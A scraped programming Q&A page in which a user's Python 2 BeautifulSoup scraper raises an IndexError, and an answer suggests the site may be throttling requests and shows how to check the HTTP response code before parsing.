page ispection
using :
from bs4 import BeautifulSoup
import urllib
import re
r = urllib.urlopen("").read()
soup = BeautifulSoup(r,"lxml")
letters = soup.findAll("span",class_=re.compile("product-card__name"))
print type(letters)
print letters[0]
Traceback (most recent call last):
File "C:/Python27/project/testaja.py", line 9, in
print letters[0]
IndexError: list index out of range
I think you may have hit their page too much, navigate there in a browser and see what the page returns on your network.
Also, you can modify your code so you can check the page response header to make sure that the page returned properly before trying to scrape it. I modified your code to show an example of this below:
from bs4 import BeautifulSoup import urllib import re r = urllib.urlopen("") header_code = r.getcode() if header_code == 200: html = r.read() soup = BeautifulSoup(html, "lxml") letters = soup.findAll("span", {"class" : re.compile("product-card__name")}) for letter in letters: print letter else: print("oops, something went wonky. Page response was: %s"% header_code)
|
https://codedump.io/share/8LNHQqhZp4nt/1/python-beautifulsoup-can39t-read-div-tag
|
CC-MAIN-2016-44
|
refinedweb
| 186
| 58.38
|
On Dec 7, 2006, at 2:51 AM, Ard Schrijvers wrote:
> 1) The lightweight StripNameSpaceTransformer is an option to strip
> intermediate namespaces you want to get rid of (like after sql
> transformer, I would like to get rid of them as fast as possible). Add
> this to trunk/branch or not?
+1
> 2) The XHTML serializer: Make it by default strip the list of
> namespaces we know people don't want to sent to the browser.
> Configurable: added namespaces to be stripped.
-1. IMO (a) the serializers are not the place to do anything w/
namespaces, and (b) in particular w/ XHTML you have no idea what
namespaces I want or don't want sent to the browser, (c) you said "by
default" which implies some way of overriding the default, i.e. another
configuration detail to document, and (d) if we're adding a transformer
to do this already (see above), then it's kind of moot :-)
> About serializers: Does anybody know why we have a serialization part
> in cocoon core and one in a serializers block? Is it preferred to use
> serializers from the serializers block?
Good question, I'd like to know as well...
Cheers,
—ml—
|
http://mail-archives.apache.org/mod_mbox/cocoon-dev/200612.mbox/%3C331040e7c58b7c35f71a75e07e6a6343@wrinkledog.com%3E
|
CC-MAIN-2015-11
|
refinedweb
| 199
| 64.14
|
Swiftz is a Swift library for functional programming.
It defines functional data structures, functions, idioms, and extensions that augment
the Swift standard library.
For a small, simpler way to introduce functional primitives into any codebase,
see Swiftx.
Introduction
Swiftz draws inspiration from a number of functional libraries
and languages. Chief among them are Scalaz,
Prelude/Base, SML
Basis, and the OCaml Standard
Library. Elements of
the library rely on their combinatorial semantics to allow declarative ideas to
be expressed more clearly in Swift.
Swiftz is a proper superset of Swiftx that
implements higher-level data types like Arrows, Lists, HLists, and a number of
typeclasses integral to programming with the maximum amount of support from the
type system.
To illustrate use of these abstractions, take these few examples:
Lists
import struct Swiftz.List //: Cycles a finite list of numbers into an infinite list. let finite : List<UInt> = [1, 2, 3, 4, 5] let infiniteCycle = finite.cycle() //: Lists also support the standard map, filter, and reduce operators. let l : List<Int> = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] let twoToEleven = l.map(+1) // [2, 3, 4, 5, 6, 7, 8, 9, 10, 11] let even = l.filter((==0) • (%2)) // [2, 4, 6, 8, 10] let sum = l.reduce(curry(+), initial: 0) // 55 //: Plus a few more. let partialSums = l.scanl(curry(+), initial: 0) // [0, 1, 3, 6, 10, 15, 21, 28, 36, 45, 55] let firstHalf = l.take(5) // [1, 2, 3, 4, 5] let lastHalf = l.drop(5) // [6, 7, 8, 9, 10]
Semigroups and Monoids Swiftz.Monoid import func Swiftz.mconcat import struct Swiftz.Sum //: Or the sum of a list with the Sum Monoid. let sum = mconcat(xs.map { Sum($0) }).value() // 10 import struct Swiftz.Product //: Or the product of a list with the Product Monoid. let product = mconcat(xs.map { Product($0) }).value() // 0
Arrows
import struct Swiftz.Function import struct Swiftz.Either //: An Arrow is a function just like any other. Only this time around we //: can treat them like a full algebraic structure and introduce a number //: of operators to augment them. let comp = Function.arr(+3) • Function.arr(*6) • Function.arr(/2) let both = comp.apply(10) // 33 //: An Arrow that runs both operations on its input and combines both //: results into a tuple. let add5AndMultiply2 = Function.arr(+5) &&& Function.arr(*2) let both = add5AndMultiply2.apply(10) // (15, 20) //: Produces an Arrow that chooses a particular function to apply //: when presented with the side of an Either. let divideLeftMultiplyRight = Function.arr(/2) ||| Function.arr(*2) let left = divideLeftMultiplyRight.apply(.Left(4)) // 2 let right = divideLeftMultiplyRight.apply(.Right(7)) // 14
Operators
See Operators for a list of supported operators.
Setup
To add Swiftz to your application:
Using Carthage
- Add Swiftz to your Cartfile
- Run
carthage update
- Drag the relevant copy of Swiftz into your project.
- Expand the Link Binary With Libraries phase
- Click the + and add Swiftz
- Click the + at the top left corner to add a Copy Files build phase
- Set the directory to
Frameworks
- Click the + and add Swiftz
Using Git Submodules
- Clone Swiftz as a submodule into the directory of your choice
- Run
git submodule init -i --recursive
- Drag
Swiftz.xcodeprojor
Swiftz-iOS.xcodeprojinto your project tree as a subproject
- Under your project’s Build Phases, expand Target Dependencies
- Click the + and add Swiftz
- Expand the Link Binary With Libraries phase
- Click the + and add Swiftz
- Click the + at the top left corner to add a Copy Files build phase
- Set the directory to
Frameworks
- Click the + and add Swiftz
Using Swift Package Manager
- Add Swiftz to your
Package.swiftwithin your project’s
Packagedefinition:
let package = Package( name: "MyProject", ... dependencies: [ .package(url: "", from: "0.0.0") ... ], targets: [ .target( name: "MyProject", dependencies: ["Swiftz"]), ... ] )
System Requirements
Swiftz supports OS X 10.9+ and iOS 8.0+.
License
Swiftz is released under the BSD license.
Latest podspec
{ "name": "Swiftz", "version": "0.8.0", "summary": "Swiftz is a Swift library for functional programming.", "homepage": "", "license": { "type": "BSD" }, "authors": { "CodaFi": "[email protected]", "pthariensflame": "[email protected]" }, "requires_arc": true, "platforms": { "osx": "10.9", "ios": "8.0", "tvos": "9.1", "watchos": "2.1" }, "source": { "git": "", "tag": "0.8.0", "submodules": true }, "source_files": [ "Sources/Swiftz/*.swift", "Carthage/Checkouts/Swiftx/Sources/Swiftx/*.swift", "Carthage/Checkouts/Operadics/Sources/Operadics/Operators.swift" ] }
Mon, 08 Apr 2019 10:56:10 +0000
|
https://tryexcept.com/articles/cocoapod/swiftz
|
CC-MAIN-2019-22
|
refinedweb
| 720
| 60.41
|
view raw
When I started project I went with GSON as most completed and with a good backing.
I feel now that it is not performing very well. So, let's say when I load array of 200 items (objects) from web service - it will take like 5 seconds to parse it out into object array on my Nexus S. On Emulator it is even more pronounced. In this case I like emulator slowness as it shows all this bad spots very well.
Now that my app is pretty much solid - I'm looking into different ways to do what I need to do and maybe save on install size. I had to bake GSON into my app with custom namespace because of HTC issues.
|
https://codedump.io/share/7e6MJ76cIxn2/1/light-and-fast-android-json-parser
|
CC-MAIN-2017-22
|
refinedweb
| 125
| 78.99
|
i have written the following code. the problem is when i run (F9), i dont see my output neither do i see any error in the program. any idea why? thx in advance.
empId: an array of seven long integers to hold employee identification numbers.
hours: an array of seven integers to hold the number of hours worked
by each employee
payRate: an array of seven floats to hold each employee's hourly pay rate
wages: an array of seven floats.
#include <cstdlib> #include <iostream> #include <iomanip> using namespace std; int main(int argc, char *argv[]) { const int size = 7; long empID[size] = {5658845, 4520125, 7895122, 8777541, 8451277, 7302850, 7580489}; int hours[size]; float payRate[size]; float wages[size]; //Function Prototypes float getWages(float); float displayWages(float); cout<<"Enter the info for each of the following employees "<<endl; cout<<"identified by their ID numbers: "<<endl; getWages(1); displayWages(1); //_________________________________________________________________________________________ //Input hours worked float getWages(float size, int hours, float payRate, float empID); { for (int index = 0; index < size; index++) { cout<<" "<<endl; cout<<"Employee number: "<<empID[index]<<endl; cout<<"Number of hours worked: "; cin>>hours[index]; //eliminate negative numbers while (hours[index] < 0) { cout<<"Employee can not work negative hours"<<endl; cout<<"Number of hours worked: "; cin>>hours[index]; } cout<<"Pay Rate: "; cin>>payRate[index]; } } //____________________________________________________________________________ //Display the hours worked and the employees number float displayWages(float wages, float size, int hours, float Payrate, float empID); cout<<"\n\n"<<endl; cout<<"Employee Number Wages "<<endl; cout<<"__________________________________"<<endl; cout<< fixed << showpoint << setprecision(2); for (int index = 0; index <size; index++) { double wages = hours[index] * payRate[index]; cout<<" "<<empID[index]<<" $ "<<wages<<endl; } cin.ignore(-1u); // clears EVERYTHING out of cin cin.clear(); // resets cin so the next line will work cin.get(); // wait for a character to be pressed // system("PAUSE"); // return EXIT_SUCCESS; }
|
https://www.daniweb.com/programming/software-development/threads/94175/help-plz
|
CC-MAIN-2017-39
|
refinedweb
| 302
| 53.85
|
IEEE/The Open Group
2013
PROLOG
This manual page is part of the POSIX Programmer’s Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.
NAME
isnan — test for a NaN
SYNOPSIS
#include <math.h>
int isnan(real-floating x);
DESCRIPTION
The functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1-2008 defers to the ISO C standard.
The isnan() macro shall determine whether its argument value is a NaN. First, an argument represented in a format wider than its semantic type is converted to its semantic type. Then determination is based on the type of the argument.
RETURN VALUE
The isnan() macro shall return a non-zero value if and only if its argument has a NaN value.
ERRORS
No errors are defined.
The following sections are informative.
EXAMPLES
None.
APPLICATION USAGE
None.
RATIONALE
None.
FUTURE DIRECTIONS
None.
SEE ALSO
fpclassify(), isfinite(), isinf(), isnormal(), signbit() .
|
https://reposcope.com/man/en/3p/isnan
|
CC-MAIN-2020-29
|
refinedweb
| 189
| 51.55
|
"Undefined symbols for arch. i386" when including C++ library in iOS simulator build
Hi all,
I have been struggling for a long time to include the simplest C++ library in a Qt Quick iOS application. I'm able to include C++ code directly in the project, but not from a lib. Any help would be highly appreciated. I use Qt for iOS and Android 5.5.0, Qt creator 3.4.2 and Xcode 6.4.
- First I start a new project and choose the C++ library template. I have tried to choose both shared and static library.
This is my header file with an empty constructor.
#ifndef TESTLIB_STATIC_H #define TESTLIB_STATIC_H class Testlib_static { public: Testlib_static(); void void_testBeskjed(); }; #endif // TESTLIB_STATIC_H
And this is the .pro file:
\#------------------------------------------------- \# \# Project created by QtCreator 2015-10-01T11:14:00 \# \#------------------------------------------------- QT -= gui TARGET = testlib_static TEMPLATE = lib CONFIG += staticlib SOURCES += testlib_static.cpp HEADERS += testlib_static.h unix { target.path = /usr/lib INSTALLS += target } QMAKE_IOS_DEPLOYMENT_TARGET = 8.4
I build this library with the iphonesimulator-clang toolkit. I have Xcode 6.4 installed. Then I run lip to check the file:
$lipo -info libtestlib_static.a
Architectures in the fat file: libtestlib_static.a are: i386 x86_64
Then I start a new project and choose the Qt Quick Application.
I right click the project and select add external library and select the libtestlib_static.a which I have built. It says it will be linked statically, both when I have tried to create a shared and static library in point 1 above.
- I create a Testlib_static object in the Qt Quick application, but get the compile/link error described in the beginning.
#include <QApplication> #include <QQmlApplicationEngine> #include <testlib_static.h> int main(int argc, char *argv[]) { Testlib_static lib; QApplication app(argc, argv); QQmlApplicationEngine engine; engine.load(QUrl(QStringLiteral("qrc:/main.qml"))); return app.exec(); }
Here is the .pro file of my project:
TEMPLATE = app QT += qml quick widgets SOURCES += main.cpp RESOURCES += qml.qrc QMAKE_IOS_DEPLOYMENT_TARGET = 8.4 # Additional import path used to resolve QML modules in Qt Creator's code model QML_IMPORT_PATH = # Default rules for deployment. include(deployment.pri) macx: LIBS += -L$$PWD/../testlib_static/build-testlib_static-iphonesimulator_clang_Qt_5_5_0_ios-Debug/ -ltestlib_static INCLUDEPATH += $$PWD/../testlib_static/testlib_static DEPENDPATH += $$PWD/../testlib_static/testlib_static macx: PRE_TARGETDEPS += $$PWD/../testlib_static/build-testlib_static-iphonesimulator_clang_Qt_5_5_0_ios-Debug/libtestlib_static.a
- Here is the error message. I can not figure out why the i386 is missing:
Undefined symbols for architecture i386: "Testlib_static::Testlib_static()", referenced from: _qtmn in main.o ld: symbol(s) not found for architecture i386 clang: error: linker command failed with exit code 1 (use -v to see invocation) ** BUILD FAILED ** The following build commands failed: Ld Debug-iphonesimulator/qtQuick_testJon.app/qtQuick_testJon normal i386 (1 failure) make[1]: *** [iphonesimulator-debug] Error 65 make: *** [debug-iphonesimulator] Error 2 11:05:27: The process "/usr/bin/make" exited with code 2. Error while building/deploying project qtQuick_testJon (kit: iphonesimulator-clang Qt 5.5.0 (ios)) When executing step "Make" 11:05:27: Elapsed time: 00:03.
So I finally found a part in the documentation saying:
PRE_TARGETDEPS
Lists libraries that the target depends on. Some backends, such as the generators for Visual Studio and Xcode project files, do not support this variable. Generally, this variable is supported internally by these build tools, and it is useful for explicitly listing dependent static libraries.
Apparently I have to include the lib manually in the .xcodeproj file. That worked, but isn't Add Library... supposed to add the necessary commands to the .pro file?
|
https://forum.qt.io/topic/59762/undefined-symbols-for-arch-i386-when-including-c-library-in-ios-simulator-build
|
CC-MAIN-2018-39
|
refinedweb
| 573
| 52.46
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.